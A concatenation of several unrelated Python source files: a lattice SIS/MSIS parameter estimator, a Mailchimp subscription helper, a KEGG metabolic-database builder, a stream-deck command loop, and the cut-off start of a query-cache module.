Compute list of estimate functions on a corresponding SIS instance according to the attack configuration by interpreting the coefficients of elements of :math:`\mathcal{R}_q` as vectors in :math:`\mathbb{Z}_q^n` as in :cite:`ACDDPPVW18`, p. 6.
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "RSIS"}]`` where "prio" is the priority value of the algorithm (lower values have shorted estimated runtime)
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
sis = SIS(
n=self.n,
q=self.q,
m=self.m * self.n,
bound=self.bound,
variant="RSIS",
label=self.label,
)
return sis.get_estimate_algorithms(config=config)
def to_SIS(self):
"""
:returns: SIS instance with dimension :math:`n=n \cdot d` and :math:`m=m \cdot n`
"""
return SIS(
n=self.n,
q=self.q,
m=self.m * self.n,
bound=self.bound,
variant="RSIS",
label=self.label,
)
def __str__(self):
return f"RSIS [n={str(self.n)}, q={str(self.q)}, m={str(self.m)}, bound ({type(self.bound).__name__})={str(float(self.bound.value))}]"
class StatisticalMSIS:
r"""
Statistically secure MSIS according to :cite:`DOTT21`, section 4.1.
MSIS problem instance where the probability that non zero elements :math:`\mathbf{r}` in the Euclidean ball :math:`B_{m}(0, 2B)` satisfy :math:`\hat{\mathbf{A}}_1 \cdot \mathbf{r} = \mathbf{0}` is smaller than :math:`2^{-\texttt{sec}}`.
Mapping of parameters in :cite:`DOTT21` to use here:
============================ ============= ============================================
Parameters in :cite:`DOTT21` Use Here Represents
============================ ============= ============================================
:math:`m'` :math:`m+d` width of matrix :math:`\hat{\mathbf{A}}_1`
:math:`m` :math:`m` height of matrix :math:`\hat{\mathbf{A}}_1`
:math:`B` :math:`B` norm-bound of secret
:math:`s` :math:`s` Gaussian width (not stddev)
:math:`N` :math:`n` degree of ring polynomial
============================ ============= ============================================
The number of elements in :math:`B_{m+d}(0, 2B)` can be estimated from above as :math:`|B_{m+d}(0, 2B)| \ll (2 \pi e /((m+d) n))^{(m+d) n/2} \cdot (2 B)^{(m+d) n}`. The scheme is statistically binding if the probability that non zero elements in :math:`B_{m+d}(0, 2B)` of radius :math:`2B` in :math:`\mathcal{R}_q^{m+d}` map to :math:`\mathbf{0}` in :math:`\mathcal{R}_q^{m}` is negligible. Hence, it must hold that :math:`|B_{m+d}(0, 2B)|/q^{m n} \leq 2^{-\texttt{sec}}` and we get:
.. math::
\left(\sqrt{\frac{2 \pi e}{(m+d) \cdot n}} \cdot 2 B\right)^{(m+d) \cdot n} &\leq 2^{-\texttt{sec}} \cdot q^{m\cdot n} \\
B &\leq 2^{\frac{-\texttt{sec}}{(m+d)\cdot n} - 1} \cdot q^\frac{m}{m+d} \cdot \sqrt{\frac{(m+d)\cdot n}{2 \pi e}}\\
We convert the bound :math:`B` to a Gaussian over :math:`\ell_2`-norm by following the procedure described in :ref:`to_Lp <to_Lp>`:
.. math::
s \approx x \sqrt{\frac{\pi}{(\texttt{sec} + 1) \ln(2)}}
:ivar max_sigma: standard deviation :math:`\sigma`
:ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
"""
def __init__(self, sec, n, d, q, m):
"""
:param sec: required bit security of MSIS instance
:param n: degree of ring polynomial
:param d: rank of module (or height of matrix)
:param q: modulus
:param m: number of samples (or width of matrix)
"""
# TODO: check paramters
max_beta = RR(
2 ** (-sec / ((m + d) * n) - 1)
* q ** (m / (m + d))
* sqrt((m + d) * n / (2 * pi * e))
)
# convert beta bound to Gaussian width parameter
self.max_s = max_beta * sqrt(pi / ((sec + 1) * log(2.0)))
self.max_sigma = est.stddevf(self.max_s)
self.max_beta = norm.Lp(max_beta, 2, n * d) # TODO: is the dimension correct?
self.sec = sec
self.n = n
self.d = d
self.q = q
self.m = m
def get_secret_distribution_max_width(self):
return distributions.GaussianSigma(
sigma=self.max_sigma, q=self.q, componentwise=False, sec=self.sec
) # TODO check, specify dimensions? or not needed?
class StatisticalMatrixMSIS(StatisticalMSIS):
r"""
Statistically secure MSIS according to :cite:`DOTT21`, section 4.1.
For more details, see :class:`StatisticalMSIS`.
:ivar max_sigma: standard deviation :math:`\sigma`
:ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
"""
def __init__(self, n, q, width, height, sec=None):
r"""
:param n: degree of ring polynomial
:param q: modulus
:param width: width of matrix :math:`\mathbf{A}`
:param height: height of matrix :math:`\mathbf{A}`
:param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
"""
super().__init__(n=n, q=q, d=width - height, m=height, sec=sec)
class StatisticalRSIS(StatisticalMSIS):
r"""
Statistically secure RSIS according to :cite:`DOTT21`, section 4.1.
For details, see :class:`StatisticalMSIS` with module dimension :math:`d=1`.
:ivar max_sigma: standard deviation :math:`\sigma`
:ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
"""
def __init__(self, sec, n, q, m):
"""
:param sec: required bit security of MSIS instance
:param n: degree of ring polynomial
:param q: modulus
:param m: number of samples (or width of matrix)
"""
super().__init__(sec=sec, n=n, d=1, q=q, m=m) # TODO: check Gaussian
class StatisticalSIS(StatisticalMSIS):
r"""
Statistically secure RSIS according to :cite:`DOTT21`, section 4.1.
For details, see :class:`StatisticalMSIS` with degree of ring polynomial dimension :math:`n=1`, height of matrix becomes rank of modulus (i.e., :math:`d=n`).
:ivar max_sigma: standard deviation :math:`\sigma`
:ivar max_beta: max bound :math:`\beta` in :math:`\ell_2`-norm
"""
def __init__(self, sec, n, q, m):
"""
:param sec: required bit security of MSIS instance
:param n: height of matrix
:param q: modulus
:param m: width of matrix
"""
super().__init__(sec=sec, n=1, d=n, q=q, m=m)
|
mailing_list.py | import threading
from mailchimp import Mailchimp, ListDoesNotExistError, EmailNotExistsError, ListAlreadySubscribedError, Error
from django.conf import settings
class SubscribeToMailingList(object):
def __init__(self, email, first_name, last_name):
self.email = email
self.first_name = first_name
self.last_name = last_name
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def print_error(self, err_msg):
err_msg = 'Failed to subscribe {first} {last}({email}) to mailing list: {err_msg}'.format(
first=self.first_name, last=self.last_name, email=self.email, err_msg=err_msg)
print(err_msg)
def run(self):
if settings.MAILCHIMP_API_KEY is None:
self.print_error('MAILCHIMP_API_KEY not set')
return False
api_key = settings.MAILCHIMP_API_KEY
list_id = settings.MAILCHIMP_SUBSCRIBE_LIST_ID
api = Mailchimp(api_key)
try:
api.lists.subscribe(list_id, {'email': self.email})
except (ListDoesNotExistError, EmailNotExistsError, ListAlreadySubscribedError, Error) as e:
self.print_error(repr(e))
return False
|
build_KEGG_db.py | from __future__ import print_function
__author__ = 'Leanne Whitmore'
__email__ = 'lwhitmo@sandia.gov'
__description__ = 'Build metabolic db using KEGG db'
from multiprocessing import Process, Queue
import re
import sqlite3
import urllib2
import httplib
import pubchempy
from tqdm import tqdm
from Database import query as Q
from sys import platform
if platform == 'darwin':
from indigopython130_mac import indigo
from indigopython130_mac import indigo_inchi
elif platform == "linux" or platform == "linux2":
from indigopython130_linux import indigo
from indigopython130_linux import indigo_inchi
elif platform == "win32" or platform == "win64":
from indigopython130_win import indigo
from indigopython130_win import indigo_inchi
IN = indigo.Indigo()
INCHI = indigo_inchi.IndigoInchi(IN)
KEGG = 'http://rest.kegg.jp/'
def BuildKEGG(types_orgs, inchidb, processors, currentcpds,
num_organisms='all', num_pathways='all'):
"""Build metabolic database from KEGG DB"""
types_orgs = types_orgs.lower()
orgIDs = extract_KEGG_orgIDs(types_orgs, num_organisms)
metabolic_clusters = {}
pathwayIDs = {}
pathwayIDs_set = set()
removeorg = []
output_queue = Queue()
args_organism = [orgIDs.keys()[i:i+processors]
for i in range(0, len(orgIDs.keys()), processors)]
print ('STATUS: get KEGG pathway IDs')
for orgs in tqdm(args_organism):
processes = []
for org in orgs:
processes.append(Process(target=extract_pathwayIDs,
args=(org, num_pathways, output_queue)))
for p in processes:
p.start()
for p in processes:
result_tuples = output_queue.get()
pathwayIDs.update(result_tuples[0])
removeorg.extend(result_tuples[1])
for orgID in removeorg:
del orgIDs[orgID]
cluster_count = 0
for orgID, pathways in pathwayIDs.iteritems():
for pathway in pathways:
pathwayIDs_set.add(pathway)
if metabolic_clusters:
check = False
for key in metabolic_clusters:
if pathways == pathwayIDs[metabolic_clusters[key][0]]:
check = True
metabolic_clusters[key].append(orgID)
break
if check is False:
cluster_count += 1
metabolic_clusters.setdefault(cluster_count, []).append(orgID)
else:
cluster_count += 1
metabolic_clusters.setdefault(cluster_count, []).append(orgID)
print ('STATUS: get KEGG reaction IDs')
output_queue = Queue()
pathwayIDs_set_list = list(pathwayIDs_set)
args_pathways = [pathwayIDs_set_list[i:i+processors]
for i in range(0, len(pathwayIDs_set_list), processors)]
pathway_reactionIDs = {}
noreactions = []
for pathways in tqdm(args_pathways):
processes = []
for pathway in pathways:
processes.append(Process(target=extract_reactionIDs, args=(pathway, output_queue)))
for p in processes:
p.start()
for p in processes:
result_tuples = output_queue.get()
pathway_reactionIDs.update(result_tuples[0])
noreactions.extend(result_tuples[1])
reactionIDs = {}
reactions_set = set()
for orgID, pathways in pathwayIDs.iteritems():
reactionIDs[orgID] = []
for pathway in pathways:
try:
for reaction in pathway_reactionIDs[pathway]:
reactionIDs[orgID].append(reaction)
reactions_set.add(reaction)
except KeyError:
print ('WARNING: No reactions for '+str(pathway))
reactions_set_list = list(reactions_set)
reactioninfo_final = {}
inchi_cf = {}
inchi_cas = {}
cpd2inchi_final = {}
compoundinfo_final = {}
output_queue = Queue()
args_reactions = [reactions_set_list[i:i+processors]
for i in range(0, len(reactions_set_list), processors)]
print ('STATUS: get KEGG reaction detailed information')
for reactions in tqdm(args_reactions):
processes = []
for reaction in reactions:
processes.append(Process(target=process_reaction,
args=(reaction, inchidb, compoundinfo_final,
cpd2inchi_final, inchi_cf, inchi_cas,
currentcpds, output_queue)))
for p in processes:
p.start()
for p in processes:
result_tuples = output_queue.get()
reactioninfo_final.update(result_tuples[0])
cpd2inchi_final.update(result_tuples[1])
inchi_cf.update(result_tuples[2])
inchi_cas.update(result_tuples[3])
compoundinfo_final.update(result_tuples[4])
return(orgIDs, metabolic_clusters, reactioninfo_final,
reactionIDs, cpd2inchi_final, inchi_cf, inchi_cas,
compoundinfo_final)
def extract_KEGG_orgIDs(types_orgs, num_organisms):
"""Retrieve organism IDs in KEGG"""
print ('STATUS: get KEGG '+types_orgs+' organism IDs')
orgIDs = {}
darray = extract_KEGG_data(KEGG+'list/organism')
if types_orgs == 'all':
for value in tqdm(darray):
array = value.split('\t')
try:
orgIDs[array[1]] = array[2]
except IndexError:
pass
if num_organisms != 'all':
if len(orgIDs) == int(num_organisms):
break
else:
types_orgs = re.sub('\s+', '', types_orgs)
types_orgs_array = types_orgs.split(',')
print (types_orgs_array)
for value in tqdm(darray):
array = value.split('\t')
try:
array[3] = array[3].lower()
matches = []
for org in types_orgs_array:
match = re.search(org, array[3])
if match:
matches.append(match)
if matches:
print (array[3])
orgIDs[array[1]] = array[2]
except IndexError:
pass
if num_organisms != 'all':
if len(orgIDs) == int(num_organisms):
break
print ('STATUS: {} organisms from KEGG'.format(len(orgIDs)))
return orgIDs
def extract_pathwayIDs(orgID, num_pathways, output_queue):
"""Retrieve pathway IDs"""
pathwayIDs = {}
removeorg = []
darray = extract_KEGG_data(KEGG+'list/pathway/'+orgID)
if darray:
for count1, value in enumerate(darray):
array = value.split('\t')
array[0] = re.sub('path:'+orgID, '', array[0])
pathwayIDs.setdefault(orgID, []).append(array[0])
if num_pathways != 'all':
if count1 == int(num_pathways):
break
else:
print ('WARNING: Could not get pathways for '+orgID+' so removing it from organisms')
removeorg.append(orgID)
output_queue.put((pathwayIDs, removeorg))
def extract_reactionIDs(pathway, output_queue):
"""Extract reactions in pathways"""
temp_reactionIDs = {}
temp_noreactions = []
darray = extract_KEGG_data(KEGG+'link/rn/map'+pathway)
if darray:
for value in darray:
array = value.split('\t')
try:
array[1] = re.sub('rn:', '', array[1])
temp_reactionIDs.setdefault(pathway, []).append(array[1])
except IndexError:
pass
else:
print ('WARNING: No reactions linked to pathway '+str(pathway))
temp_noreactions.append(pathway)
output_queue.put((temp_reactionIDs, temp_noreactions))
def process_reaction(reactionID, inchidb, compoundinfo, cpd2inchi, inchi_cf, inchi_cas, currentcpds, output_queue):
"""Extract reaction info"""
reactioninfo = {}
darray = extract_KEGG_data(KEGG+'get/'+reactionID)
if darray:
reactioninfo[reactionID] = {}
reactioninfo[reactionID]['reactants'] = {}
reactioninfo[reactionID]['products'] = {}
for value in darray:
array = value.split()
if 'NAME' in array:
reactioninfo[reactionID]['name'] = array[1]
if 'ENZYME' in array:
reactioninfo[reactionID]['enzyme'] = array[1]
if 'EQUATION' in array:
array.remove('EQUATION')
equation_string = ' '.join(array)
if '<=>' in array:
reactioninfo[reactionID]['reversible'] = 'true'
reaction = equation_string.split(' <=> ')
reactants = reaction[0].split(' + ')
products = reaction[1].split(' + ')
for reactant in reactants:
(reactioninfo,
cpd2inchi_individual,
inchi_cf_individual,
inchi_cas_individual,
compoundinfo_individual) = process_compound(reactant, reactionID,
reactioninfo, False,
inchidb, compoundinfo,
cpd2inchi, inchi_cf,
inchi_cas, currentcpds)
cpd2inchi.update(cpd2inchi_individual)
inchi_cf.update(inchi_cf_individual)
inchi_cas.update(inchi_cas_individual)
compoundinfo.update(compoundinfo_individual)
for product in products:
(reactioninfo,
cpd2inchi_individual,
inchi_cf_individual,
inchi_cas_individual,
compoundinfo_individual) = process_compound(product, reactionID,
reactioninfo, True,
inchidb, compoundinfo,
cpd2inchi, inchi_cf,
inchi_cas, currentcpds)
cpd2inchi.update(cpd2inchi_individual)
inchi_cf.update(inchi_cf_individual)
inchi_cas.update(inchi_cas_individual)
compoundinfo.update(compoundinfo_individual)
else:
reactioninfo[reactionID]['reversible'] = 'false'
reaction = equation_string.split(' => ')
reactants = reaction[0].split(' + ')
products = reaction[1].split(' + ')
for reactant in reactants:
(reactioninfo,
cpd2inchi_individual,
inchi_cf_individual,
inchi_cas_individual,
compoundinfo_individual) = process_compound(reactant, reactionID,
reactioninfo, False,
inchidb, compoundinfo,
cpd2inchi, inchi_cf,
inchi_cas, currentcpds)
cpd2inchi.update(cpd2inchi_individual)
inchi_cf.update(inchi_cf_individual)
inchi_cas.update(inchi_cas_individual)
compoundinfo.update(compoundinfo_individual)
for product in products:
(reactioninfo,
cpd2inchi_individual,
inchi_cf_individual,
inchi_cas_individual,
compoundinfo_individual) = process_compound(product, reactionID,
reactioninfo, True,
inchidb, compoundinfo,
cpd2inchi, inchi_cf,
inchi_cas, currentcpds)
cpd2inchi.update(cpd2inchi_individual)
inchi_cf.update(inchi_cf_individual)
inchi_cas.update(inchi_cas_individual)
compoundinfo.update(compoundinfo_individual)
if 'enzyme' not in reactioninfo[reactionID].keys():
reactioninfo[reactionID]['enzyme'] = 'None'
if 'name' not in reactioninfo[reactionID].keys():
reactioninfo[reactionID]['name'] = 'None'
output_queue.put((reactioninfo, cpd2inchi, inchi_cf, inchi_cas, compoundinfo))
def process_compound(cpd, reactionID, reactioninfo, is_prod,
inchidb, compoundinfo, cpd2inchi, inchi_cf,
inchi_cas, currentcpds):
"""Extract compound info"""
cpd = re.sub('\s*\(\S+\)$', '', cpd)
cpd = re.sub('^\(\S+\)\s*', '', cpd)
match = re.search('^\d', cpd)
match2 = re.search('^\w+\s+', cpd)
if match:
stoichiometry = int(match.group(0))
cpd = re.sub('^\d+ ', '', cpd)
elif match2:
stoichiometry = 1
cpd = re.sub('^\w+\s+', '', cpd)
else:
stoichiometry = 1
if cpd in compoundinfo and not inchidb:
reactioninfo = add_metabolite(reactionID, cpd, stoichiometry, is_prod, reactioninfo)
elif cpd not in compoundinfo and not inchidb:
reactioninfo = add_metabolite(reactionID, cpd, stoichiometry, is_prod, reactioninfo)
darray = extract_KEGG_data(KEGG+'get/'+cpd)
count_name = 0
if darray:
for value in darray:
array = value.split()
if 'NAME' in array:
count_name += 1
compoundinfo[cpd] = array[1]
if count_name == 0:
compoundinfo[cpd] = 'None'
else:
compoundinfo[cpd] = 'None'
elif inchidb and cpd in cpd2inchi.values():
reactioninfo = add_metabolite(reactionID, cpd2inchi.keys()[cpd2inchi.values().index(cpd)],
stoichiometry, is_prod, reactioninfo)
else:
if cpd in currentcpds and 'c0' in currentcpds[cpd]:
reactioninfo = add_metabolite(reactionID, currentcpds[cpd]['c0'],
stoichiometry, is_prod, reactioninfo)
else:
darray = extract_KEGG_data(KEGG+'get/'+cpd)
if inchidb:
inchicpd = None
if darray:
for value in darray:
array = value.split()
if 'PubChem:' in array:
index = array.index('PubChem:')
sid = array[index+1]
try:
substance = pubchempy.Substance.from_sid(sid)
substance_cids = substance.cids
if substance_cids:
try:
compounds = pubchempy.get_compounds(substance_cids[0])
if compounds:
inchicpd = compounds[0].inchi
mol = INCHI.loadMolecule(inchicpd)
# fp = mol.fingerprint('full')
# buffer = fp.toBuffer()
# buffer_array = [str(i) for i in buffer]
# buffer_string = ','.join(buffer_array)
cf = mol.grossFormula()
cf = re.sub(' ', '', cf)
cpd2inchi[inchicpd] = cpd
# inchi_fp[inchicpd] = buffer_string
inchi_cf[inchicpd] = cf
else:
inchicpd = cpd
except (pubchempy.PubChemHTTPError, httplib.BadStatusLine,
urllib2.URLError):
inchicpd = cpd
else:
inchicpd = cpd
except (pubchempy.PubChemHTTPError, httplib.BadStatusLine,
urllib2.URLError):
print ('WARNING: Could not get substance for '+ sid)
inchicpd = cpd
if not inchicpd:
inchicpd = cpd
else:
inchicpd = cpd
reactioninfo = add_metabolite(reactionID, inchicpd,
stoichiometry, is_prod, reactioninfo)
else:
reactioninfo = add_metabolite(reactionID, cpd,
stoichiometry, is_prod, reactioninfo)
count_name = 0
for value in darray:
array = value.split()
if 'NAME' in array:
count_name += 1
if inchidb:
compoundinfo[inchicpd] = array[1]
else:
compoundinfo[cpd] = array[1]
if 'CAS:' in array:
index = array.index('CAS:')
cas = array[index+1]
if inchidb:
inchi_cas[inchicpd] = cas
else:
inchi_cas[cpd] = cas
if count_name == 0:
if inchidb:
compoundinfo[inchicpd] = 'None'
else:
compoundinfo[cpd] = 'None'
return (reactioninfo, cpd2inchi, inchi_cf, inchi_cas, compoundinfo)
def add_metabolite(reactionID, cpd, stoichiometry, is_prod, reactioninfo):
"""add metabolites to dictionary"""
if is_prod:
reactioninfo[reactionID]['products'][cpd] = stoichiometry
else:
reactioninfo[reactionID]['reactants'][cpd] = stoichiometry
return reactioninfo
def extract_KEGG_data(url):
'''Extract Kegg db info'''
try:
data = urllib2.urlopen(url).read()
darray = data.split('\n')
return darray
except (httplib.BadStatusLine, urllib2.URLError):
return None
class CompileKEGGIntoDB(object):
"""Add KEGG info to sqlite database"""
def __init__(self, database, type_org, inchidb, processors,
num_organisms, num_pathways, rxntype, add):
"""Initialize"""
self.database = database
self.inchidb = inchidb
self.rxntype = rxntype
self.currentcpds = {}
self.conn = sqlite3.connect(self.database, check_same_thread=False)
self.conn.text_factory = str
self.cnx = self.conn.cursor()
self.DB = Q.Connector(database)
A = self.cnx.execute('SELECT * from compound')
results = A.fetchall()
for i in results:
self.currentcpds.setdefault(i[3], {})
self.currentcpds[i[3]].setdefault(i[2], i[0])
(self.orgIDs,
self.metabolic_clusters,
self.reactioninfo,
self.reactionIDs,
self.cpd2inchi,
self.inchi_cf,
self.inchi_cas,
self.compoundinfo) = BuildKEGG(type_org, self.inchidb, processors,
self.currentcpds, num_organisms, num_pathways)
print ('STATUS: Adding kegg info to database')
if add:
self.add_to_preexisting_db()
else:
self.cnx = sqlite3.connect(database)
self.fill_new_database()
def add_to_preexisting_db(self):
'''Add KEGG info to already developed database'''
cytosol = '_'+self.DB.get_compartment('cytosol')[0]
all_current_keggIDs = set(self.DB.get_all_keggIDs())
all_cytosol_rxn = {}
QC = self.cnx.execute("""SELECT * from reaction""")
results = QC.fetchall()
for result in results:
if (re.search('c0', result[0]) is not None) and result[2] != 'None':
all_cytosol_rxn[result[2]] = result[0]
print ('STATUS: KEGG ..ENTERING MODELS')
for orgID in self.orgIDs:
self.cnx.execute("INSERT INTO model VALUES (?,?)", (orgID, self.orgIDs[orgID]+'_KEGG'))
self.conn.commit()
print ('STATUS: KEGG ..ENTERING CLUSTERS')
Q = self.cnx.execute('''SELECT DISTINCT cluster_num FROM cluster''')
hits = Q.fetchall()
uniq_clusters = [i[0] for i in hits]
for key, orgIDs in self.metabolic_clusters.iteritems():
for orgID in orgIDs:
self.cnx.execute("INSERT INTO cluster VALUES (?,?)", (len(uniq_clusters)+key, orgID))
self.conn.commit()
'''GET CURRENT COMPOUNDS IN DATABASE'''
Q = self.cnx.execute("""SELECT ID from compound""")
hits = Q.fetchall()
dbcpds = [i[0] for i in hits]
dbcpds = list(set(dbcpds))
reaction_protein = []
reaction_gene = []
model_reactions = []
model_compounds = []
print ('STATUS: KEGG ..ENTERING MODEL REACTIONS, GENES, PROTEINS')
for orgID, reactions in tqdm(self.reactionIDs.iteritems()):
cpds_all = set()
for reaction in reactions:
if reaction in all_cytosol_rxn:
try:
rxn = self.reactioninfo[reaction]
model_reactions.append((all_cytosol_rxn[reaction], orgID, rxn['reversible']))
try:
reaction_protein.append((all_cytosol_rxn[reaction], orgID, rxn['enzyme']))
except KeyError:
reaction_protein.append((all_cytosol_rxn[reaction], orgID, 'None'))
reaction_gene.append((all_cytosol_rxn[reaction], orgID, 'None'))
cpds_all.update(rxn['reactants'])
cpds_all.update(rxn['products'])
except KeyError:
print ('WARNING: No reaction info for {}'.format(reaction))
else:
try:
rxn = self.reactioninfo[reaction]
model_reactions.append((reaction+cytosol, orgID, rxn['reversible']))
try:
reaction_protein.append((reaction+cytosol, orgID, rxn['enzyme']))
except KeyError:
reaction_protein.append((reaction+cytosol, orgID, 'None'))
reaction_gene.append((reaction+cytosol, orgID, 'None'))
cpds_all.update(rxn['reactants'])
cpds_all.update(rxn['products'])
except KeyError:
print ('WARNING: No reaction info for {}'.format(reaction))
for cpd in cpds_all:
if cpd.endswith('c0'):
model_compounds.append((cpd, orgID))
else:
model_compounds.append((cpd+cytosol, orgID))
self.cnx.executemany("INSERT INTO model_compound VALUES (?,?)", model_compounds)
self.cnx.executemany("INSERT INTO model_reaction VALUES (?,?,?)", model_reactions)
self.cnx.executemany("INSERT INTO reaction_protein VALUES (?,?,?)", reaction_protein)
self.cnx.executemany("INSERT INTO reaction_gene VALUES (?,?,?)", reaction_gene)
self.conn.commit()
print ('STATUS: KEGG ..ENTERING REACTIONS')
all_cpds_to_add = set()
reaction_reversibility = []
reactions = []
reaction_compounds = []
for reaction in self.reactioninfo:
if reaction not in all_current_keggIDs:
reaction_reversibility.append((reaction+cytosol, self.reactioninfo[reaction]['reversible']))
try:
reactions.append((reaction+cytosol, self.reactioninfo[reaction]['name'], reaction, self.rxntype))
except KeyError:
reactions.append((reaction+cytosol, 'None', reaction, self.rxntype))
for reactant in self.reactioninfo[reaction]['reactants']:
all_cpds_to_add.add(reactant)
if reactant.endswith('c0'):
reaction_compounds.append((reaction+cytosol, reactant, 0,
self.reactioninfo[reaction]['reactants'][reactant], 0))
else:
reaction_compounds.append((reaction+cytosol, reactant+cytosol, 0,
self.reactioninfo[reaction]['reactants'][reactant], 0))
for product in self.reactioninfo[reaction]['products']:
all_cpds_to_add.add(product)
if product.endswith('c0'):
reaction_compounds.append((reaction+cytosol, product, 1,
self.reactioninfo[reaction]['products'][product], 0))
else:
reaction_compounds.append((reaction+cytosol, product+cytosol, 1,
self.reactioninfo[reaction]['products'][product], 0))
self.cnx.executemany("INSERT INTO reaction_reversibility VALUES (?,?)",
reaction_reversibility)
self.cnx.executemany("INSERT INTO reaction VALUES (?,?,?,?)",
reactions)
self.cnx.executemany("INSERT INTO reaction_compound VALUES (?,?,?,?,?)",
reaction_compounds)
self.conn.commit()
compounds = []
print ('STATUS: KEGG ..ENTERING COMPOUNDS')
for cpd in all_cpds_to_add:
if cpd.endswith('_c0') or cpd+'_c0' in dbcpds:
pass
else:
if cpd.startswith('InChI'):
try:
compounds.append((cpd+cytosol, self.compoundinfo[cpd],
self.DB.get_compartment('cytosol')[0],
self.cpd2inchi[cpd],
self.inchi_cf.get(cpd, 'None'),
self.inchi_cas.get(cpd, 'None')))
except KeyError:
compounds.append((cpd+cytosol, 'None',
self.DB.get_compartment('cytosol')[0],
self.cpd2inchi[cpd],
self.inchi_cf.get(cpd, 'None'),
self.inchi_cas.get(cpd, 'None')))
else:
try:
compounds.append((cpd+cytosol, self.compoundinfo[cpd],
self.DB.get_compartment('cytosol')[0],
'None',
self.inchi_cf.get(cpd, 'None'),
self.inchi_cas.get(cpd, 'None')))
except KeyError:
compounds.append((cpd+cytosol, 'None',
self.DB.get_compartment('cytosol')[0],
'None',
self.inchi_cf.get(cpd, 'None'),
self.inchi_cas.get(cpd, 'None')))
self.cnx.executemany("INSERT INTO compound VALUES (?,?,?,?,?,?)", compounds)
self.conn.commit()
def fill_new_database(self):
"""Fill database"""
cytosol = '_c0' #define compartment
self.cnx.execute("INSERT INTO compartments VALUES (?,?)", ('c0', 'cytosol'))
self.cnx.execute("INSERT INTO compartments VALUES (?,?)", ('e0', 'extracellular'))
for orgID in self.orgIDs:
self.cnx.execute("INSERT INTO model VALUES (?,?)", (orgID, self.orgIDs[orgID]+'_KEGG'))
self.cnx.commit()
for key, orgIDs in self.metabolic_clusters.iteritems():
for orgID in orgIDs:
self.cnx.execute("INSERT INTO cluster VALUES (?,?)", (key, orgID))
self.cnx.commit()
for orgID, reactions in self.reactionIDs.iteritems():
cpds_all = set()
for reaction in reactions:
reaction_cm = reaction+cytosol
self.cnx.execute("INSERT INTO reaction_protein VALUES (?,?,?)",
(reaction_cm, orgID, self.reactioninfo[reaction]['enzyme']))
self.cnx.execute("INSERT INTO reaction_gene VALUES (?,?,?)",
(reaction_cm, orgID, 'None'))
self.cnx.execute("INSERT INTO model_reaction VALUES (?,?,?)",
(reaction_cm, orgID, self.reactioninfo[reaction]['reversible']))
cpds_all.update(self.reactioninfo[reaction]['reactants'])
cpds_all.update(self.reactioninfo[reaction]['products'])
for cpd in cpds_all:
self.cnx.execute("INSERT INTO model_compound VALUES (?,?)", (cpd+cytosol, orgID))
self.cnx.commit()
all_cpds_to_add = set()
for reaction in self.reactioninfo:
reaction_cm = reaction+cytosol
self.cnx.execute("INSERT INTO reaction_reversibility VALUES (?,?)",
(reaction_cm, self.reactioninfo[reaction]['reversible']))
self.cnx.execute("INSERT INTO reaction VALUES (?,?,?,?)",
(reaction_cm, self.reactioninfo[reaction]['name'], reaction, self.rxntype))
for reactant in self.reactioninfo[reaction]['reactants']:
self.cnx.execute("INSERT INTO reaction_compound VALUES (?,?,?,?,?)",
(reaction_cm, reactant+cytosol, 0,
self.reactioninfo[reaction]['reactants'][reactant], 0))
all_cpds_to_add.add(reactant)
for product in self.reactioninfo[reaction]['products']:
self.cnx.execute("INSERT INTO reaction_compound VALUES (?,?,?,?,?)",
(reaction_cm, product+cytosol, 1,
self.reactioninfo[reaction]['products'][product], 0))
all_cpds_to_add.add(product)
self.cnx.commit()
if self.inchidb:
for inchi in self.cpd2inchi:
self.cnx.execute("INSERT INTO original_db_cpdIDs VALUES (?,?)",
(self.cpd2inchi[inchi]+cytosol, inchi+cytosol))
self.cnx.commit()
for cpd in all_cpds_to_add:
self.cnx.execute("""INSERT INTO compound VALUES (?,?,?,?,?,?)""",
(cpd+cytosol, self.compoundinfo[cpd], 'c0', cpd),
self.inchi_cf.get(cpd, 'None'), self.inchi_cas.get(cpd, 'None'))
self.DB = Q.Connector(self.database)
|
OpenStreamDeck.py | """OpenStreamDeck"""
from threading import Thread
from interfaces import Interface
import time
class OpenStreamDeck():
def __init__(self, interface: Interface, components: list) -> None:
self.interface = interface
self.run_thread = Thread(target=self._run, args=(), daemon=True)
self.components = {}
for component in components:
self.components[component.id] = component
def _init_components(self, components: list):
for component in components:
self.components[component.id] = component
def start(self):
self.run_thread.do_run = True
self.run_thread.start()
while True:
time.sleep(0.1)
def _run(self):
while getattr(self.run_thread, "do_run", True):
data = self.interface.read()
try:
if data:
if data == 'exit':
self.run_thread.do_run = False
exit()
command = data.split(' ')
if command[0] in self.components:
self.components[command[0]].trigger(event=command[1])
print(data)
time.sleep(0.1)
except IndexError:
print("Invalid command...")
|
query_cache.py | import threading
import time
# Define a query cache.
# ==========================
class Entry:
"""An entry in a QueryCache.
"""
timestamp = None # The timestamp of the last query run [datetime.datetime]
lock = None # Access control for this record [threading.Lock]
exc = None # Any exception in query or formatting [Exception]
def __init__(self, timestamp=0, lock=None, result=None):
"""Populate with dummy data or an actual db entry.
"""
self.timestamp = timestamp
self.lock = lock or threading.Lock()
self.result = result
class QueryCache:
"""Implement a caching SQL post-processor.
Instances of this object are callables that take two or more arguments. The
first argument is a callback function; subsequent arguments are strings of
SQL. The callback function will be given one result set per SQL query, and
in the same order. These result sets are lists of dictionaries. The
callback function may return any Python data type; this is the query
result, post-processed for your application.
The results of the callback are cached for <self.threshold> seconds
(default: 5), keyed to the given SQL queries. NB: the cache is *not* keyed
to the callback function, so cache entries with different callbacks will
collide when operating on identical SQL queries. In this case cache entries
can be differentiated by adding comments to the SQL statements.
This so-called micro-caching helps greatly when under load, while keeping
pages more or less fresh. For relatively static page elements like
navigation, the time could certainly be extended. But even for page
elements which are supposed to seem completely dynamic -- different for
each page load -- you can profitably use this object with a low cache
setting (1 or 2 seconds): the page will appear dynamic to any given user,
but 100 requests in the same second will only result in one database call.
This object also features a pruning thread, which removes stale cache
entries on a more relaxed schedule (default: 60 seconds). It keeps the
cache clean without interfering too much with actual usage.
If the actual database call or the formatting callback raise an Exception,
